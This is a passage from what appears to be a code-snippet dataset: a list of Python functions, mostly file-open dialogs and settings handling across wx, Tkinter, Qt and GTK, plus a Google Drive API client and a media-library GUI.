n.views['appIdentifier'].setStringValue_('')\n\n except Exception as err:\n print('An Error Occured: {0}'.format(err))", "def FileDialog( message, wildcard, style, defaultDir=os.getcwd(), defaultFile='' ):\n dlg = wx.FileDialog( wx.GetApp().GetTopWindow(), message, defaultDir, defaultFile, wildcard, style )\n if dlg.ShowModal() == wx.ID_OK:\n if style & wx.MULTIPLE:\n result = dlg.GetPaths()\n else:\n result = dlg.GetPath()\n else:\n result = False\n dlg.Destroy()\n \n return result", "def __init__(\n self,\n title:str=\"Universal File Dialog\",\n icon:str=\"\",\n show_hidden:bool=False,\n include_files:bool=True,\n multiselect:bool=True,\n select_dirs:bool=True,\n select_files:bool=True,\n unix_delimiter:bool=True,\n stdout:bool=False\n ):\n\n if not isinstance(title, str):\n raise TypeError(\"Argument title must be type string.\")\n\n self.title = title\n\n if icon:\n if not isinstance(icon, str):\n raise TypeError(\"Argument icon must be type string.\")\n\n if not isfile(icon):\n raise FileNotFoundError(f\"File not found: {icon}\")\n\n self.icon = icon\n\n else: \n self.icon = \"\"\n\n if show_hidden:\n self.show_hidden = True\n else:\n self.show_hidden = False\n\n if include_files:\n self.include_files = True\n else:\n self.include_files = False\n\n if multiselect:\n self.multiselect = True\n else:\n self.multiselect = False\n\n if select_dirs:\n self.select_dirs = True\n else:\n self.select_dirs = False\n\n if select_files:\n self.select_files = True\n else:\n self.select_files = False\n\n if unix_delimiter:\n self.unix_delimiter = True\n else:\n self.unix_delimiter = False\n\n if stdout:\n self.stdout = True\n else:\n self.stdout = False\n\n # Tkinter:\n self.dialog = Tk()\n self.dialog.withdraw()\n self.dialog.title(self.title)\n self.dialog.minsize(width=300, height=200)\n self.dialog.geometry(\"500x300\")\n self.dialog.update_idletasks()\n\n self.file_icon=PhotoImage(\n file=f\"{dirname(__file__)}/file.gif\",\n master=self.dialog\n ).subsample(50)\n\n self.folder_icon=PhotoImage(\n file=f\"{dirname(__file__)}/folder.gif\",\n master=self.dialog\n ).subsample(15)\n \n self.disk_icon=PhotoImage(\n file=f\"{dirname(__file__)}/disk.gif\",\n master=self.dialog\n ).subsample(15)\n\n if self.icon:\n self.dialog.iconbitmap(self.icon)\n else:\n self.dialog.iconbitmap(f\"{dirname(__file__)}/icon.ico\")\n \n # Widgets:\n self.paneview = PanedWindow(\n self.dialog,\n sashwidth=7,\n bg=\"#cccccc\",\n bd=0,\n )\n\n self.left_pane = PanedWindow(self.paneview)\n self.right_pane = PanedWindow(self.paneview)\n self.paneview.add(self.left_pane)\n self.paneview.add(self.right_pane)\n\n self.treeview_x_scrollbar=Scrollbar(self.left_pane, orient=\"horizontal\")\n self.treeview_y_scrollbar=Scrollbar(self.left_pane, orient=\"vertical\")\n self.list_box_x_scrollbar=Scrollbar(self.right_pane, orient=\"horizontal\")\n self.list_box_y_scrollbar=Scrollbar(self.right_pane, orient=\"vertical\")\n \n # tstyle = Style().configure(\".\", )\n\n self.treeview=Treeview(\n self.left_pane,\n xscrollcommand=self.treeview_x_scrollbar.set,\n yscrollcommand=self.treeview_y_scrollbar.set,\n show=\"tree\",\n selectmode=\"browse\",\n # style=tstyle\n )\n\n\n self.list_box=Listbox(\n self.right_pane,\n xscrollcommand=self.list_box_x_scrollbar.set,\n yscrollcommand=self.list_box_y_scrollbar.set,\n width=34,\n highlightthickness=0,\n bd=2,\n relief=\"ridge\"\n )\n\n if self.multiselect:\n self.list_box.config(selectmode=\"extended\")\n else:\n self.list_box.config(selectmode=\"browse\")\n\n self.cancel_button = Button(\n 
self.left_pane,\n text=\"Cancel\",\n command=self.cancel\n )\n\n self.submit_button = Button(\n self.right_pane,\n text=\"Submit\",\n command=self.submit\n )\n\n self.treeview_x_scrollbar.config(command=self.treeview.xview)\n self.treeview_y_scrollbar.config(command=self.treeview.yview)\n self.list_box_x_scrollbar.config(command=self.list_box.xview)\n self.list_box_y_scrollbar.config(command=self.list_box.yview)\n \n #Layout:\n self.dialog.rowconfigure(0, weight=1)\n self.dialog.columnconfigure(0, weight=1)\n\n self.left_pane.grid_rowconfigure(0, weight=1)\n self.left_pane.grid_columnconfigure(0, weight=1)\n self.right_pane.grid_rowconfigure(0, weight=1)\n self.right_pane.grid_columnconfigure(0, weight=1)\n\n self.paneview.paneconfigure(\n self.left_pane,\n minsize=100,\n #Start off w/ the sash centered in the GUI:\n width=(self.dialog.winfo_width() / 2) - \n ceil((self.paneview.cget(\"sashwidth\") * 1.5)),\n )\n self.paneview.paneconfigure(self.right_pane, minsize=100)\n\n self.paneview.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n\n self.treeview.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n self.treeview_y_scrollbar.grid(\n row=0,\n column=1,\n sticky=\"ns\"\n )\n self.treeview_x_scrollbar.grid(\n row=1,\n column=0,\n columnspan=2,\n sticky=\"ew\"\n )\n\n self.list_box.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n self.list_box_y_scrollbar.grid(\n row=0,\n column=1,\n sticky=\"ns\"\n )\n self.list_box_x_scrollbar.grid(\n row=1,\n column=0,\n columnspan=2,\n sticky=\"ew\"\n )\n\n self.cancel_button.grid(\n row=2,\n column=0,\n sticky=\"w\",\n padx=10, \n pady=10\n )\n self.submit_button.grid(\n row=2,\n column=0,\n columnspan=2,\n sticky=\"e\",\n padx=10,\n pady=10\n )\n \n #Bindings, Protocols, & Misc:\n self.dialog.bind(\"<Control-w>\", self.cancel)\n self.treeview.bind(\"<<TreeviewSelect>>\", self.treeview_select)\n self.treeview.bind(\"<Double-Button-1>\", self.dialog_populate)\n self.treeview.bind(\"<Return>\", self.dialog_populate)\n self.treeview.bind(\"<Right>\", self.dialog_populate)\n self.list_box.bind(\"<<ListboxSelect>>\", self.list_box_select)\n self.list_box.bind(\"<Return>\", self.submit)\n self.dialog.protocol(\"WM_DELETE_WINDOW\", self.cancel)\n\n self.dialog_selection = deque()\n self.selection_paths = deque()\n\n for disk in self.get_disks():\n self.treeview.insert(\n \"\",\n index=\"end\",\n text=disk,\n image=self.disk_icon,\n )\n\n self.dialog.focus()", "def test_default_path(self):\n options = ControlOptions()\n options.parseOptions([])\n self.assertEqual(options[\"data-path\"], FilePath(b\"/var/lib/flocker\"))", "def __call__(self):\n\n (width_offset, height_offset)=self.get_offset(self.dialog)\n self.dialog.geometry(f\"+{width_offset}+{height_offset}\")\n self.dialog.update_idletasks()\n self.dialog.deiconify()\n\n self.dialog.wait_window()\n\n for i, path in enumerate(self.dialog_selection):\n if self.unix_delimiter:\n self.dialog_selection[i] = sub(\"\\\\\\\\\", \"/\", path)\n else:\n self.dialog_selection[i] = sub(\"/\", \"\\\\\\\\\", path)\n\n\n if self.stdout:\n [print(item) for item in self.dialog_selection]\n\n return list(self.dialog_selection)", "def askopenfilename():\n\n file_opt = options = {}\n options['defaultextension'] = '.*'\n options['initialdir'] = 'User\\\\'\n options['initialfile'] = ''\n options['parent'] = root\n options['title'] = 'choose file'\n options['multiple'] = 1\n\n # get filename\n filename = tk.filedialog.askopenfilename(**file_opt)\n\n if filename:\n self.sourcefile = filename\n if len(filename) is 1:\n 
file_path_var.set(filename)\n else:\n file_path_var.set(\n \"Multiple files, including {}\".format(filename[0]))", "def __init__(self, dialog_title='', dialog_format='',\n start_dir=os.path.expanduser('~/'),\n icon_size=(12, 20), minimal_width=200,\n browse_label='Browse', on_open=None,\n reload_button=True, reload_label='Reload',\n recent_files=None, directory_aliases=None,\n allow_empty=True, empty_file_label='(none)'):\n super().__init__()\n self.dialog_title = dialog_title\n self.dialog_format = dialog_format\n self.start_dir = start_dir\n\n # Recent files should also contain `empty_file_label` so\n # when (none) is selected this is stored in settings.\n self.recent_files = recent_files if recent_files is not None else []\n self.directory_aliases = directory_aliases or {}\n self.allow_empty = allow_empty\n self.file_combo = None\n self.empty_file_label = empty_file_label\n if self.empty_file_label not in self.recent_files \\\n and (self.allow_empty or not self.recent_files):\n self.recent_files.append(self.empty_file_label)\n\n self.check_existence()\n self.on_open.connect(on_open)\n\n layout = QHBoxLayout(self)\n layout.setContentsMargins(0, 0, 0, 0)\n\n if recent_files is not None:\n self.file_combo = QComboBox()\n self.file_combo.setMinimumWidth(minimal_width)\n self.file_combo.activated[int].connect(self.select)\n self.update_combo()\n layout.addWidget(self.file_combo)\n\n self.browse_button = QPushButton(browse_label)\n self.browse_button.setFocusPolicy(Qt.NoFocus)\n self.browse_button.clicked.connect(self.browse)\n self.browse_button.setIcon(self.style()\n .standardIcon(QStyle.SP_DirOpenIcon))\n self.browse_button.setIconSize(QSize(*icon_size))\n self.browse_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n layout.addWidget(self.browse_button)\n\n if reload_button:\n self.reload_button = QPushButton(reload_label)\n self.reload_button.setFocusPolicy(Qt.NoFocus)\n self.reload_button.clicked.connect(self.reload)\n self.reload_button.setIcon(self.style()\n .standardIcon(QStyle.SP_BrowserReload))\n self.reload_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.reload_button.setIconSize(QSize(*icon_size))\n layout.addWidget(self.reload_button)", "def askOpenFileName(parent, title, wc, remember =- 1, filetype = None):\n\tasklist = []\n\tif remember == -1:\n\t\tconf = Configuration.getConfiguration()\n\t\tremember = conf.getConfigItem(\"RememberPath\", \"Paths\")\n\tlastpath = \"\"\n\tftype = wc.split(\"|\")[1]\n\tftype = ftype.split(\".\")[1]\n\tif filetype != None:\n\t\tftype = filetype\n\tif remember:\n\t\tlastpath = conf.getConfigItem(\"LastPath_%s\" % ftype, \"Paths\")\n\t\tif not lastpath:\n\t\t\tlastpath = \".\"\n\tdlg = wx.FileDialog(parent, title, lastpath, wildcard = wc, style = wx.OPEN|wx.MULTIPLE)\n\tif dlg.ShowModal() == wx.ID_OK:\n\t\tasklist = dlg.GetPaths()\n\t\tasklist = map(unicode, asklist)\n\t\tif not asklist:\n\t\t\treturn asklist\n\t\tif remember:\n\t\t\tfilepath = os.path.dirname(asklist[0])\n\t\t\tconf.setConfigItem(\"LastPath_%s\" % ftype, \"Paths\", filepath)\n\t\t\n\tdlg.Destroy() \n\treturn asklist", "def configure(prompt_list):\n darwin_vers = int(os.uname()[2].split('.')[0])\n edited_prefs = {}\n for (key, prompt) in prompt_list:\n newvalue = get_input_with_default('%15s: ' % prompt, pref(key))\n if darwin_vers == 10:\n # old behavior in SL: hitting return gives you an empty string,\n # and means accept the default value.\n edited_prefs[key] = newvalue or pref(key) or ''\n else:\n # just use the edited value as-is\n 
edited_prefs[key] = newvalue\n\n if FOUNDATION_SUPPORT:\n for key, value in edited_prefs.items():\n try:\n CFPreferencesSetAppValue(key, value, BUNDLE_ID)\n except BaseException:\n print('Could not save configuration!', file=sys.stderr)\n raise ConfigurationSaveError\n # remove repo_path if it exists since we don't use that\n # any longer (except for backwards compatibility) and we don't\n # want it getting out of sync with the repo_url\n CFPreferencesSetAppValue('repo_path', None, BUNDLE_ID)\n CFPreferencesAppSynchronize(BUNDLE_ID)\n\n else:\n try:\n existing_prefs = readPlist(PREFSPATH)\n existing_prefs.update(edited_prefs)\n # remove repo_path if it exists since we don't use that\n # any longer (except for backwards compatibility) and we don't\n # want it getting out of sync with the repo_url\n if 'repo_path' in existing_prefs:\n del existing_prefs['repo_path']\n writePlist(existing_prefs, PREFSPATH)\n except (IOError, OSError, ExpatError):\n print('Could not save configuration to %s' % PREFSPATH,\n file=sys.stderr)\n raise ConfigurationSaveError", "def __init__(self, parent):\n QtGui.QDialog.__init__(self, parent)\n self.parent = parent\n self.ui = Ui_FileSelectDialog()\n self.ui.setupUi(self)\n mneRoot = os.environ.get('MNE_ROOT', '')\n if mneRoot == \"\":\n mneRoot = self.settings.value(\"MNE_ROOT\", \"\").toString()\n self.ui.lineEditMneRoot.setText(mneRoot)\n self.show()", "def readConfigFileDlg( self ):\n fileName = QtGui.QFileDialog.getOpenFileName( self, \"Read application config file\", self.rsrc.lastFolder, \"Config files (*.cfg)\" )\n if ( fileName ):\n self.readConfigFile( fileName )\n path, fName = os.path.split( str( fileName ) )\n self.rsrc.lastFolder = path", "def choose_file(self):\n pass", "def readOptions(self):\n get = command_line.CommandLineParser().get_option\n if get('nosplash')!=None:\n self.temp_configuration.showSplash = bool(get('nosplash'))\n if get('debugsignals')!=None:\n self.temp_configuration.debugSignals = bool(get('debugsignals'))\n if get('dotVistrails')!=None:\n self.temp_configuration.dotVistrails = get('dotVistrails')\n #in theory this should never happen because core.configuration.default()\n #should have done this already\n #if not self.configuration.check('dotVistrails'):\n # self.configuration.dotVistrails = system.default_dot_vistrails()\n # self.temp_configuration.dotVistrails = system.default_dot_vistrails()\n if get('multiheads')!=None:\n self.temp_configuration.multiHeads = bool(get('multiheads'))\n if get('maximized')!=None:\n self.temp_configuration.maximizeWindows = bool(get('maximized'))\n if get('movies')!=None:\n self.temp_configuration.showMovies = bool(get('movies'))\n if get('cache')!=None:\n self.temp_configuration.useCache = bool(get('cache'))\n if get('verbose')!=None:\n self.temp_configuration.verbosenessLevel = get('verbose')\n if get('noninteractive')!=None:\n self.temp_configuration.interactiveMode = \\\n not bool(get('noninteractive'))\n if get('workflowinfo') != None:\n self.temp_configuration.workflowInfo = str(get('workflowinfo'))\n if get('dumpcells') != None:\n self.temp_configuration.spreadsheetDumpCells = get('dumpcells')\n if get('pdf') != None:\n self.temp_configuration.spreadsheetDumpPDF = get('pdf')\n if get('workflowgraph') != None:\n self.temp_configuration.workflowGraph = str(get('workflowgraph'))\n if get('evolutiongraph') != None:\n self.temp_configuration.evolutionGraph = str(get('evolutiongraph'))\n if get('executeworkflows') != None:\n self.temp_configuration.executeWorkflows = \\\n 
bool(get('executeworkflows'))\n if get('showspreadsheetonly') != None:\n self.temp_configuration.showSpreadsheetOnly = \\\n bool(get('showspreadsheetonly'))\n # asking to show only the spreadsheet will force the workflows to\n # be executed\n if get('reviewmode') != None:\n self.temp_configuration.reviewMode = bool(get('reviewmode'))\n\n if self.temp_configuration.showSpreadsheetOnly and not self.temp_configuration.reviewMode:\n self.temp_configuration.executeWorkflows = True\n \n self.temp_db_options = InstanceObject(host=get('host'),\n port=get('port'),\n db=get('db'),\n user=get('user'),\n parameters=get('parameters')\n )\n if get('nologger')!=None:\n self.temp_configuration.nologger = bool(get('nologger'))\n if get('quickstart') != None:\n self.temp_configuration.staticRegistry = str(get('quickstart'))\n if get('detachHistoryView')!= None:\n self.temp_configuration.detachHistoryView = bool(get('detachHistoryView'))\n self.input = command_line.CommandLineParser().positional_arguments()", "def __init__(self):\n\n self.builder = Gtk.Builder()\n self.builder.add_from_file(\"google_client.glade\")\n self.builder.connect_signals(self)\n window = self.builder.get_object(\"global_window\")\n\n #self.bashrcpath = os.path.expanduser('~') + \"/\" + \".bashrc\"\n cwd_dir = os.getcwd()\n self.filepath = os.listdir(path='.')\n self.treeview = self.builder.get_object(\"treeview\")\n self.store = Gtk.ListStore(str, str)\n\n #self.loadPaths()\n \n window.connect(\"destroy\", Gtk.main_quit)\n \n window.show_all()\n Gtk.main()\n\n\n #Drive API AUTHENTICATION\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n #To clear login cache, just delete the file, and on the next execution you will\n #be required to authenticate again (Allow access to Google Drive)\n\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n\n # If there are no (valid) credentials available, require the user to log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('drive', 'v3', credentials=creds) #We are using V3 API\n\n # the label we use to show the selection\n label = Gtk.Label()\n label.set_text(\"\")\n\n #Trying handlers approach\n handlers = {\n \"on_list_clicked\": listFiles(10),\n \"on_men_destroy\": Gtk.main_quit\n }\n\n \n #Listing files\n def listFiles(size):\n results = service.files().list(\n pageSize= size, fields=\"nextPageToken, files(id, name)\").execute()\n items = results.get('files', [])\n\n #Check if there exists files to be loaded\n if not items:\n print('No files found.')\n else:\n print('Files:')\n for item in items:\n print(u'{0} ({1})'.format(item['name'], item['id'])) #List the files\n #listFiles(10)\n\n #Uploading files (from local directory)\n def uploadFile(filename,filepath,mimetype):\n file_metadata = {'name': filename}\n media = MediaFileUpload(filepath,\n mimetype=mimetype)\n file = service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: %s' % file.get('id'))\n \n uploadFile('google.jpg', 'google.jpg', 'image/jpeg')\n\n\n #Downloading 
files (We dont do this now)\n def downloadFile(file_id,filepath):\n request = service.files().get_media(fileId=file_id)\n fh = io.BytesIO()\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while done is False:\n status, done = downloader.next_chunk()\n print(\"Download %d%%.\" % int(status.progress() * 100))\n with io.open(filepath,'wb') as f:\n fh.seek(0)\n f.write(fh.read())\n\n #Creating a folder\n def createFolder(name):\n file_metadata = {\n 'name': name,\n 'mimeType': 'application/vnd.google-apps.folder'\n }\n file = service.files().create(body=file_metadata,\n fields='id').execute()\n print ('Folder ID: %s' % file.get('id'))\n #createFolder(\"Lunodzo\")\n\n #Search query (Within directory)\n def searchFile(size,query):\n results = service.files().list(\n pageSize=size,fields=\"nextPageToken, files(id, name, kind, mimeType)\",q=query).execute()\n items = results.get('files', [])\n if not items:\n print('No files found.')\n else:\n print('Files:')\n for item in items:\n print(item)\n print('{0} ({1})'.format(item['name'], item['id']))\n #searchFile(10,\"name contains 'Getting'\")", "def fileDialog(*args, application: bool=True, defaultFileName: AnyStr=\"\", directoryMask:\n AnyStr=\"\", mode: int=0, title: AnyStr=\"\", **kwargs)->AnyStr:\n pass", "def __init__(self):\r\n\r\n super().__init__() # Loading the Tk window instance\r\n\r\n self.title(\"Song Storage\") # Naming the root window\r\n self.resizable(False, False) # Disabling resizing of the root window\r\n self.iconphoto(True, PhotoImage(file=\"Resources/Icons/AppIcon.png\")) # Loading the icon of the application\r\n\r\n global config_var # Using the global variable that reads and modifies the configuration file\r\n\r\n # Application's GUI was invoked from a CLI instance; updating the configuration file variable\r\n if config_var['RUN-MODE']['run_mode'] == \"1\":\r\n config_var.set('RUN-MODE', 'run_mode', \"0\")\r\n\r\n try:\r\n with open('config.ini', 'w') as configfile_gui:\r\n config_var.write(configfile_gui) # Writing the changes to the configuration file\r\n configfile_gui.close()\r\n\r\n except IOError:\r\n messagebox.showerror(\"Writing to file failed\", \"Failed to write new value to the configuration file.\"\r\n \" Please make sure no other applications are interacting with the configuration \"\r\n \"file and that \\\"config.ini\\\" is located in the folder of the application.\")\r\n\r\n # Application is running in debugging mode\r\n if config_var['RUN-MODE']['run_mode'] == \"2\":\r\n print(\"\\nError: Failed to write new value to the configuration file. 
Please make sure no other \"\r\n \"applications are interacting with the configuration file and that \\\"config.ini\\\" is located \"\r\n \"in the folder of the application.\")\r\n\r\n # The variable that shows the current run-mode of the application\r\n # It is used by the radiobuttons in the filemenu\r\n self.gui_menu_var = StringVar(self, config_var['RUN-MODE']['run_mode'])\r\n \r\n \"\"\"Declaring the variables the GUI will use\"\"\"\r\n self.menubar = Menu() # The file menu where the user can specify global settings for the application\r\n self.filemenu = Menu(self.menubar, tearoff=0) # Submenu for the file menu\r\n self.runmode_menu = Menu(self.filemenu, tearoff=0) # Submenu showing the current run-mode of the application\r\n \r\n self.folder_frame = Frame() # The frame that will display the current media folder\r\n\r\n # The value that stores the current media folder's path as a string\r\n self.var = StringVar(self, \"Please choose the folder where you'd like to store your media:\")\r\n\r\n # The label that will display the current media folder\r\n self.media_folder_label = Label(self.folder_frame, textvariable=self.var)\r\n\r\n # This button will prompt the user to select a media folder\r\n self.folder_button = Button(self.folder_frame, text=\"Browse...\",\r\n command=lambda: folder_selector(None, self))\r\n\r\n # The button that allows the user to change the currently selected media folder\r\n self.change_folder_button = ttk.Button(self.folder_frame, text=\"Change...\",\r\n command=lambda: folder_selector(None, self))\r\n\r\n # The frame that will display all the media content available inside the media folder\r\n self.media_frame = Frame()\r\n self.canvas = Canvas()\r\n\r\n self.path_frame_parent = Frame(self.media_frame, relief=GROOVE, width=500, height=100, bd=1)\r\n\r\n # Variables related to the search frame of the application\r\n self.search_frame = Frame()\r\n\r\n self.back_image = PhotoImage(file=\"Resources/Icons/Back Icon #2.png\")\r\n self.back_button = Button(self.search_frame, image=self.back_image, bg=\"#ffffff\", command=self.display_media)\r\n\r\n self.search_entry = ttk.Entry(self.search_frame, width=50)\r\n self.search_button = ttk.Button(self.search_frame, text=\"Search\",\r\n command=lambda entry=self.search_entry: self.search(self.search_entry))\r\n # self.advanced_search_button = ttk.Button(self.search_frame, text=\"Advanced Search...\")\r\n\r\n self.header = Label(self.media_frame, text=\"Available media:\")\r\n\r\n # This label will display when the user attempts to add an already-existent media file\r\n self.already_exists = Label(self.folder_frame, text=\"\")\r\n\r\n self.button_frame = Frame()\r\n\r\n # The button that allows the user to add media files from other sources\r\n self.add_music_button = ttk.Button(self.button_frame, text=\"Add Media...\", command=self.add_media_dialog)\r\n\r\n # Savelist-related variables\r\n self.create_savelist_button = ttk.Button(self.button_frame, text=\"Create Savelist...\",\r\n command=self.create_savelist)\r\n\r\n self.quit_button = ttk.Button(self.button_frame, text=\"Exit\", command=self.destroy)\r\n\r\n self.archive_name = StringVar()\r\n self.archive_name.set(\"\")\r\n\r\n # We are storing the length of the longest item in the media list in order to be able to modify the size of the\r\n # scrollable area (if necessary).\r\n self.longest_item_length = 0\r\n\r\n self.library_items = [] # The array storing info for every media file (name, buttons, metadata etc.)\r\n\r\n self.process_widgets()\r\n\r\n 
self.load_interface()\r\n\r\n self.lift()\r\n\r\n print(\"Graphical user interface loaded.\")", "def on_open_file(self):\n return tkFileDialog.askopenfilename(\n filetypes=[('default', '*.txt'), ('All files', '*.*')])", "def action(self):\n self.filename = self.ui_SelectedName.text()\n if self.filename == \"\" or self.filename is None:\n return\n\n dirname = fs.path.forcedir(\".\")\n if self.wparm is not None:\n dirname = self.selected_dir\n if dirname.startswith(self.active_url):\n filename = \"{}{}\".format(fs.path.forcedir(self.active_url), self.filename)\n else:\n # We can't use fs.path.join and also not fs.path.abspath because of protocol url\n filename = \"{}{}{}\".format(\n fs.path.forcedir(self.active_url),\n fs.path.forcedir(dirname),\n self.filename,\n )\n filename = filename.replace(fs.path.forcedir(\".\"), \"\")\n if self.show_save_action and not self.show_dirs_only:\n self.save_settings()\n self.filename = self.ui_SelectedName.text()\n if self.filename == \"\":\n return\n info = self.get_info(fs.path.split(filename)[1], namespaces=None)\n if info is not None and info.is_dir:\n sel = QtWidgets.QMessageBox.warning(\n self,\n \"Warning\",\n \"You can't create a file with this name: {0}\".format(self.filename),\n QtWidgets.QMessageBox.No,\n )\n elif info is not None and info.is_file:\n sel = QtWidgets.QMessageBox.question(\n self,\n \"Replace Filename\",\n \"This will replace the filename: {0}. Continue?\".format(\n self.filename\n ),\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,\n )\n if sel == QtWidgets.QMessageBox.Yes:\n self.filename = filename\n self.close()\n else:\n pass\n else:\n self.filename = filename\n self.close()\n else:\n self.filename = filename\n self.close()", "def __init__(self, parent=None):\n super(E5PathPicker, self).__init__(parent, useLineEdit=True)", "def _GclStyleSettings(self):\n settings = {\n 'port': self.GetCodeReviewSetting('TRYSERVER_HTTP_PORT'),\n 'host': self.GetCodeReviewSetting('TRYSERVER_HTTP_HOST'),\n 'svn_repo': self.GetCodeReviewSetting('TRYSERVER_SVN_URL'),\n 'gerrit_url': self.GetCodeReviewSetting('TRYSERVER_GERRIT_URL'),\n 'git_repo': self.GetCodeReviewSetting('TRYSERVER_GIT_URL'),\n 'project': self.GetCodeReviewSetting('TRYSERVER_PROJECT'),\n # Primarily for revision=auto\n 'revision': self.GetCodeReviewSetting('TRYSERVER_REVISION'),\n 'root': self.GetCodeReviewSetting('TRYSERVER_ROOT'),\n 'patchlevel': self.GetCodeReviewSetting('TRYSERVER_PATCHLEVEL'),\n }\n logging.info('\\n'.join(['%s: %s' % (k, v)\n for (k, v) in settings.iteritems() if v]))\n for (k, v) in settings.iteritems():\n # Avoid overwriting options already set using command line flags.\n if v and getattr(self.options, k) is None:\n setattr(self.options, k, v)", "def folder_selector(folder_path=None, gui_instance=None):\r\n\r\n global config_var # Using the global variable that reads and modifies the configuration file\r\n\r\n if gui_instance is not None: # The method has been fired by a GUI widget\r\n folder = filedialog.askdirectory() # We will use an OS-specific dialog box call to select the media folder\r\n\r\n if folder != \"\": # Checks to see if the user has canceled the operation\r\n config_var.set('MEDIA FOLDER', 'folder', folder) # Updating the value inside the configuration file\r\n\r\n try:\r\n with open('config.ini', 'w') as configfile_folder:\r\n config_var.write(configfile_folder) # Writing the changes to the configuration file\r\n configfile_folder.close()\r\n\r\n except IOError:\r\n messagebox.showerror(\"Writing to file failed\", \"Failed to write 
new value to the configuration file.\"\r\n \" Please make sure no other applications are interacting with the configuration \"\r\n \"file and that \\\"config.ini\\\" is located in the folder of the application.\")\r\n\r\n # Application is running in debugging mode\r\n if config_var['RUN-MODE']['run_mode'] == \"2\":\r\n print(\"\\nError: Failed to write new value to the configuration file. Please make sure no other \"\r\n \"applications are interacting with the configuration file and that \\\"config.ini\\\" is located \"\r\n \"in the folder of the application.\")\r\n\r\n return False\r\n\r\n gui_instance.display_media_folder() # Updating the media list\r\n\r\n gui_instance.folder_scan()\r\n\r\n else: # The method has been fired by using CLI\r\n if not os.path.exists(folder_path): # The user has specified an invalid folder\r\n print(\"\\nError: The specified directory does not exist.\")\r\n return False\r\n\r\n config_var.set('MEDIA FOLDER', 'folder', folder_path) # Updating the value inside the configuration file\r\n\r\n try:\r\n with open('config.ini', 'w') as configfile_folder:\r\n config_var.write(configfile_folder) # Writing the changes to the configuration file\r\n configfile_folder.close()\r\n\r\n except IOError:\r\n print(\"\\nError: Failed to write new value to the configuration file. Please make sure no other \"\r\n \"applications are interacting with the configuration file and that \\\"config.ini\\\" is located \"\r\n \"in the folder of the application.\")\r\n\r\n return False\r\n\r\n print(\"\\nMedia folder updated.\")\r\n\r\n return True", "def change_exteditor(self):\r\n path, valid = QInputDialog.getText(self, self.tr('External editor'),\r\n self.tr('External editor executable path:'),\r\n QLineEdit.Normal,\r\n CONF.get(self.ID, 'external_editor/path'))\r\n if valid:\r\n CONF.set(self.ID, 'external_editor/path', unicode(path))", "def openFileDialog(self): \n self.dialog = ocempgui.widgets.Box(373, 372)\n self.dialog.topleft = 528, 205\n\n background = guiobjects.OcempImageMapTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(WINDOW_UPLOAD))\n self.dialog.add_child(background)\n \n self.listDir = guiobjects.OcempImageFileList(310, 239)\n self.listDir.topleft = 31, 60\n self.dialog.add_child(self.listDir)\n\n buttonOK = guiobjects.OcempImageButtonTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_OK), self.buttonTooltips[\"ok\"], self.parent.showTooltip, self.parent.removeTooltip)\n buttonOK.topleft = [233, 308]\n buttonOK.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeFileDialog,\"OK\")\n self.dialog.add_child(buttonOK)\n \n buttonCancel = guiobjects.OcempImageButtonTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_CANCEL), self.buttonTooltips[\"cancel\"], self.parent.showTooltip, self.parent.removeTooltip)\n buttonCancel.topleft = [122, 308]\n buttonCancel.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeFileDialog,\"KO\")\n self.dialog.add_child(buttonCancel)\n\n self.window.add_child (self.dialog)", "def GetCodereviewSettingsInteractively():\n server = settings.GetServer(error_ok=True)\n prompt = 'Rietveld server (host[:port])'\n prompt += ' [%s]' % (server or DEFAULT_SERVER)\n newserver = raw_input(prompt + ': ')\n if not server and not newserver:\n newserver = DEFAULT_SERVER\n if newserver and newserver != server:\n cl_settings.RunGit(['config', 'rietveld.server', newserver])\n\n tracker_server = settings.GetTrackerServer(error_ok=True)\n prompt = 'Allura server'\n prompt += ' [%s]' % 
tracker_server\n newtracker = raw_input(prompt + ': ')\n while not tracker_server and not newtracker:\n prompt = 'You must provide the address of the Allura tracker server: '\n newtracker = raw_input(prompt)\n if newtracker and newtracker != tracker_server:\n cl_settings.RunGit(['config', 'allura.tracker', newtracker])\n\n token = settings.GetToken(error_ok=True)\n prompt = 'Allura bearer token (see https://sourceforge.net/auth/oauth/)'\n prompt += ' [%s]' % token\n newtoken = raw_input(prompt + ': ')\n while not token and not newtoken:\n prompt = 'You must provide a bearer token to authenticate: '\n newtoken = raw_input(prompt)\n if newtoken and newtoken != token:\n cl_settings.RunGit(['config', 'allura.token', newtoken])\n\n def SetProperty(initial, caption, name):\n prompt = caption\n if initial:\n prompt += ' (\"x\" to clear) [%s]' % initial\n new_val = raw_input(prompt + ': ')\n if new_val == 'x':\n cl_settings.RunGit(['config', '--unset-all', 'rietveld.' + name], error_ok=True)\n elif new_val and new_val != initial:\n cl_settings.RunGit(['config', 'rietveld.' + name, new_val])\n\n SetProperty(settings.GetCCList(), 'CC list', 'cc')", "def svn_client_propset(char_propname, svn_string_t_propval, char_target, svn_boolean_t_recurse, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass", "def gen_common_parser() -> optparse.OptionParser:\n parser = optparse.OptionParser()\n parser.add_option(\"--prefs\", dest=\"file_path\")\n return parser", "def on_open(self):\n\n ftypes = [('CSV', '.csv'), ('JSON', '.json'), ('All files', '*')]\n dlg = filedialog.Open(self, filetypes=ftypes)\n\n absolute_file_path = dlg.show()\n \n if 